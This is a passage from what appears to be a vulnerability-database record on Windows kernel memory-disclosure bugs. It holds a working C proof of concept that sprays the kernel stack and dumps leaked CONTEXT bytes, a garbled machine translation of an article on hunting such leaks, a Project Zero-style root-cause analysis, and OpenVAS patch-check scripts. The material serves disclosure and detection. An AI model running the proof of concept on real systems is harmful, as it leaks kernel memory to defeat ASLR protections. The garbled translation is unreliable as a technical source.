................\r\n00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000090: 3b 00 00 00 23 00 00 00 23 00 00 00 0c fe 2a 00 ;...#...#.....*.\r\n000000a0: 40 fd 2a 00 00 f0 fd 7f 74 6c 8e 77 89 bb c8 38 @.*.....tl.w...8\r\n000000b0: d8 fc 2a 00 28 fd 2a 00 5d 84 c3 75 1b 00 00 00 ..*.(.*.]..u....\r\n000000c0: 46 02 00 00 d8 fc 2a 00 23 00 00 00 7f 02 00 00 F.....*.#.......\r\n000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 00 00 ................\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA\r\n000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? AAAAAAAAAAAA....\r\n--- cut ---\r\n\r\nHere, we can see that 32 bytes from the kernel stack are leaked at the end of the CONTEXT structure, which correspond to the last bytes of the CONTEXT.ExtendedRegisters array. We have confirmed that when the spraying function is not invoked, this memory region discloses valid kernel-mode pointers.\r\n\r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.\r\n*/\r\n\r\n#include <Windows.h>\r\n#include <cstdio>\r\n\r\nextern \"C\"\r\nULONG WINAPI NtMapUserPhysicalPages(\r\n PVOID BaseAddress,\r\n ULONG NumberOfPages,\r\n PULONG PageFrameNumbers\r\n);\r\n\r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n\r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n\r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n\r\n printf(\"\\n\");\r\n }\r\n}\r\n\r\nVOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {\r\n for (ULONG i = 0; i < size; i++) {\r\n ptr[i] = byte;\r\n }\r\n}\r\n\r\nVOID SprayKernelStack() {\r\n // Buffer allocated in static program memory, hence doesn't touch the local stack.\r\n static BYTE buffer[4096];\r\n\r\n // Fill the buffer with 'A's and spray the kernel stack.\r\n MyMemset(buffer, 'A', sizeof(buffer));\r\n NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);\r\n \r\n // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.\r\n MyMemset(buffer, 'B', sizeof(buffer));\r\n}\r\n\r\nVOID SprayUserStack() {\r\n // Buffer allocated from the user-mode stack.\r\n BYTE buffer[4096];\r\n MyMemset(buffer, 'x', sizeof(buffer));\r\n}\r\n\r\nLONG WINAPI MyUnhandledExceptionFilter(\r\n _In_ struct _EXCEPTION_POINTERS *ExceptionInfo\r\n ) {\r\n PrintHex((PBYTE)ExceptionInfo->ContextRecord, sizeof(CONTEXT));\r\n return EXCEPTION_CONTINUE_EXECUTION;\r\n}\r\n\r\nint main() {\r\n SetUnhandledExceptionFilter(MyUnhandledExceptionFilter);\r\n\r\n SprayKernelStack();\r\n SprayUserStack();\r\n\r\n RaiseException(1337, 0, 0, NULL);\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/42220/"}], "myhack58": [{"lastseen": "2017-06-14T16:16:53", "bulletinFamily": "info", "cvelist": ["CVE-2017-8482"], "edition": 1, "description": "2017 6 on patch day, to fix up before we report 5-a kernel information leak vulnerability , the end of the article have details. \nThe year before I demonstrate how to use JS to fuzz the kernel, today we want to bring to you is not dependent on the fuzz, and to automate the mining kernel vulnerability. \nFrom the recent few months as where, select a small point, say the following kernel information leak type of vulnerability of the excavation. \nBackground \nafter windows vista, Microsoft kernel enabled by default. ASLR, referred to as KASLR. \nKASLR randomize the module's loaded base address , the kernel object address, etc., alleviate the vulnerability of the use. \nIn win8 after the security features have been further enhanced. \nThe introduction of the nt! ExIsRestrictedCaller to prevent the Low integrity of the program calls some can leak out of the module base address of the kernel object address and other key information of the function. \nInclude, but are not limited to: \nNtQuerySystemInformation \n* SystemModuleInformation \n* SystemModuleInformationEx \n* SystemLocksInformation \n* SystemStackTraceInformation \n* SystemHandleInformation \n* SystemExtendedHandleInformation \n* SystemObjectInformation \n* SystemBigPoolInformation \n* SystemSessionBigPoolInformation \n* SystemProcessInformation \n* SystemFullProcessInformation \nNtQueryInfomationThread \nNtQueryInfomationProcess \nThe above is a traditional of you can get the kernel module address and kernel address of the object method , as kernel normal function. \nBut for the integrity in the medium following procedures in win8 after the call will fail. \nKASLR as one of the exploit mitigations, of which the one purpose is to so construct a generic ROP-CHAIN is more difficult. \nAs the vulnerability of the user to dig out information leakage vulnerability, to directly leak out of the desired module base address, that is directly against KASLR approach. \nFeatures \nAs a kernel vulnerability, in the mining process there is a special place. For example, for a traditional memory corruption class of vulnerability, the vulnerability itself will affect the normal operation of the system, The use of the verifier and other tools, can be more convenient to capture this exception. \nBut the information leakage type of vulnerability, and will not trigger an exception, but also does not interfere with the normal operation of the system, which makes finding them more difficult. \nVulnerability is an objective reality, we need to do in order to as small as possible cost to discover them. \nMining ideas \nLeakage occurs, the kernel will necessarily be key information is written into the User Mode Memory, if we monitor all kernel mode write user mode address of the write operation, will be able to capture this behavior. \nOf course, the system does not provide this feature, a process by@pjf a dedicated hardware-based virtualization of the mining framework to capture. \n! [](/Article/UploadPic/2017-6/2017614185824579. png? www. myhack58. com) \nIn order not to interfere with the target system of the operation itself, I'm in a virtual machine in the implementation of the monitoring, to obtain necessary information in the written log, and then in the host machine for secondary analysis. \n! [](/Article/UploadPic/2017-6/2017614185824194. png? www. myhack58. com) \nIn the physical machine, to decode the log and the loading symbol, do some processing after the \n! [](/Article/UploadPic/2017-6/2017614185824867. png? www. myhack58. com) \nWe get such a batch of logs. \n! [](/Article/UploadPic/2017-6/2017614185825782. png? www. myhack58. com) \nSecondary analysis \nNow we have a period of actual operation of the process, the kernel writes to User-Mode Memory of all records. Here the vast majority are normal function, \nWe need to eliminate interference, find out what data is critical information. \nHere the main use of the two techniques. \nContamination of the kernel stack \nPoisoning or contamination of the target data, is a common way of thinking. In network attack and Defense, also has ARP and DNS cache poisoning\u3002 \nHere, the kernel stack poisoning, refers to the pollution of the entire unused kernel stack space. If a kernel stack variable is not initialized, \nThen this variable is written to the user mode, write the data there I the mark of the magic value ,find the magic value where the recording is the occurrence of leakage points. \nAt the same time I noticed that j00ru in his BochsPwn project has also used a similar technique. \nKiFastCallEntry Hook \nIn order to have the opportunity of contamination of the kernel stack, I Hook up KiFastCallEntry, in each system call occurs, the contamination of the current stack below the remaining stack space. \n! [](/Article/UploadPic/2017-6/2017614185825137. png? www. myhack58. com) \nThe first use of IoGetStackLimits get the current thread's scope, and then from the stack bottom to the current stack position of the entire space is filled with 0xAA. \nThus entering the system after the call, all the kernel on the stack the local variable content, will be contaminated to 0xAA. \nContamination of the kernel POOL \nSimilarly, for the dynamic allocation of memory,I use hooks ExAllocatePoolWithTag, etc., and contaminate their POOL of content. \nThus, whether it is on the stack or on the heap, as long as it is not initialized, the contents are our pollution. \nIf the kernel stack variable is not correctly initialized, it is possible to Will this magic value is written to the user-state memory. Combined with our capture of the log, you can immediately discover this information leak. \nIn order to exclude coincidences, the use of a multiple conversion magic value like 0xAAAAAAAA , 0xBBBBBBBB way to exclude false positives. \nTo exclude interference after a typical results are as follows \n! [](/Article/UploadPic/2017-6/2017614185825989. png? www. myhack58. com) \nYou can see that in a transient monitoring process, it is caught in the system 161 times leak. \nOf course, this is not re-ranked, not with so a plurality of independent vulnerabilities, but some of the vulnerabilities in the repeated leakage. \nThis time we got a real information leak vulnerability, there is a stack of information, supplemented by simple manual analysis, you can know the details \nThis is also the CVE-2017-8482 behind the story. \nDifference comparison \nFor uninitialized stack the result of kernel information leaks, we can use pollution and then look for the tags found. \nFor direct leakage of critical information, such as write directly to a module, object, POOL type of address, you cannot use this method to find. \n\n\n**[1] [[2]](<87028_2.htm>) [next](<87028_2.htm>)**\n", "modified": "2017-06-14T00:00:00", "published": "2017-06-14T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/87028.htm", "id": "MYHACK58:62201787028", "title": "Automated mining Windows kernel information disclosure vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T11:56:15", "description": "One kernel memory disclosure in the exception handling code has already been discovered and reported as issue [#1177](https://bugs.chromium.org/p/project-zero/issues/detail?id=1177) . It was fixed in the June Patch Tuesday as CVE-2017-8482. However, it seems there is another bug in this code area, this time a pool (as opposed to stack) memory leak. We've had some trouble reproducing this behavior outside of our Bochs setup, but we have performed some analysis to better understand the root cause of the bug. The analysis, specific to Windows 7 32-bit, is presented below.\r\n\r\nThe leak occurs in the nt!RtlpCopyLegacyContextX86 routine, under the following stack trace:\r\n\r\n```\r\n--- cut ---\r\n #1 nt!RtlpCopyLegacyContextX86\r\n #2 nt!RtlpCopyLegacyContext\r\n #3 nt!RtlpCopyExtendedContext\r\n[...]\r\n--- cut ---\r\n```\r\n\r\nIt does not matter if the nt!RtlpCopyExtendedContext function is reached through a user-mode exception, a soft exception triggered manually with RaiseException(), or a GetThreadContext() call -- we have seen the disclosure take place in all three cases. An example of a full callstack is as follows:\r\n```\r\n--- cut ---\r\n #1 nt!RtlpCopyLegacyContextX86\r\n #2 nt!RtlpCopyLegacyContext\r\n #3 nt!RtlpCopyExtendedContext\r\n #4 nt!KiDispatchException\r\n #5 nt!KiRaiseException\r\n #6 nt!NtRaiseException\r\n #7 nt!KiSystemServicePostCall\r\n--- cut ---\r\n```\r\n\r\nMore precisely, the leak happens inside of an inlined memcpy() call, while copying 512 bytes corresponding to the CONTEXT.ExtendedRegisters field to userland. The construct can be represented as the following C code:\r\n```\r\n--- cut ---\r\n if ( (ContextFlags & CONTEXT_EXTENDED_REGISTERS) == CONTEXT_EXTENDED_REGISTERS )\r\n memcpy(DestContext->ExtendedRegisters, SourceContext->ExtendedRegisters, sizeof(DestContext->ExtendedRegisters));\r\n--- cut ---\r\n```\r\nWithin that memory region, 192 (0xC0) bytes at offset 0x120 (or offset 0x1EC in relation to the start of the CONTEXT structure) are uninitialized pool memory bytes, originating from an allocation made in nt!KeAllocateXStateContext:\r\n```\r\n--- cut ---\r\n.text:0048B8DE push 76615358h ; Tag\r\n.text:0048B8E3 add eax, 40h\r\n.text:0048B8E6 push eax ; NumberOfBytes\r\n.text:0048B8E7 push 0 ; PoolType\r\n.text:0048B8E9 call _ExAllocatePoolWithTag@12 ; ExAllocatePoolWithTag(x,x,x)\r\n--- cut ---\r\n```\r\n\r\nThe memory appears to be allocated for an XSAVE_AREA structure, which has the following definition:\r\n```\r\n--- cut ---\r\nkd> dt _XSAVE_AREA /r\r\nntdll!_XSAVE_AREA\r\n +0x000 LegacyState : _XSAVE_FORMAT\r\n +0x000 ControlWord : Uint2B\r\n +0x002 StatusWord : Uint2B\r\n +0x004 TagWord : UChar\r\n +0x005 Reserved1 : UChar\r\n +0x006 ErrorOpcode : Uint2B\r\n +0x008 ErrorOffset : Uint4B\r\n +0x00c ErrorSelector : Uint2B\r\n +0x00e Reserved2 : Uint2B\r\n +0x010 DataOffset : Uint4B\r\n +0x014 DataSelector : Uint2B\r\n +0x016 Reserved3 : Uint2B\r\n +0x018 MxCsr : Uint4B\r\n +0x01c MxCsr_Mask : Uint4B\r\n +0x020 FloatRegisters : [8] _M128A\r\n +0x000 Low : Uint8B\r\n +0x008 High : Int8B\r\n +0x0a0 XmmRegisters : [8] _M128A\r\n +0x000 Low : Uint8B\r\n +0x008 High : Int8B\r\n +0x120 Reserved4 : [192] UChar\r\n +0x1e0 StackControl : [7] Uint4B\r\n +0x1fc Cr0NpxState : Uint4B\r\n +0x200 Header : _XSAVE_AREA_HEADER\r\n +0x000 Mask : Uint8B\r\n +0x008 Reserved : [7] Uint8B\r\n--- cut ---\r\n```\r\n\r\nAs is clearly visible, offset 0x120 of the structure is aligned with the \"Reserved4\" field consisting of 192 bytes, which is exactly how many uninitialized bytes we're observing in the leak. This suggests that the NPX context saved in XSAVE_AREA contains leftover pool bytes, which may be then copied to user-mode when a thread context with the CONTEXT_EXTENDED_REGISTERS flag is requested by a malicious, local process.\r\n\r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.", "published": "2017-10-17T00:00:00", "type": "seebug", "title": "Microsoft Windows Kernel Local Information Disclosure Vulnerability(CVE-2017-11784)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11784", "CVE-2017-8482"], "modified": "2017-10-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96721", "id": "SSV:96721", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2020-06-08T23:27:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8480", "CVE-2017-8489", "CVE-2017-8479", "CVE-2017-0300", "CVE-2017-0299", "CVE-2017-8476"], "description": "This host is missing an important security\n update according to Microsoft KB4022013", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811163", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811163", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022013)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022013)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811163\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8476\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8485\", \"CVE-2017-8489\",\n \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\",\n \"CVE-2017-8462\", \"CVE-2017-8469\");\n script_bugtraq_id(98903, 98845, 98856, 98857, 98862, 98858, 98860, 98865, 98884,\n 98869, 98870, 98901, 98900, 98842);\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 09:35:26 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022013)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4022013\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - The Windows kernel improperly initializes objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address, allowing\n an attacker to retrieve information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022013\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Advapi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19598\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19598\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24107\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24107\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Advapi32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:23:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022718", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811178", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811178", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811178\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8469\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821, 98914,\n 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826, 98929,\n 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864, 98865,\n 98840, 98867, 98869, 98870, 98884, 98901, 98887, 98900, 98818,\n 98848, 98849, 98842);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 17:00:32 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022718\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection(DIBSection) function.\n\n - Security updates to Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe and Windows Kernel-Mode\n Drivers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs, view, change, or delete data or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022718\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:20:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "description": "This host is missing a critical security\n update according to Microsoft KB4022722", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811168", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811168", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022722)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022722)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it 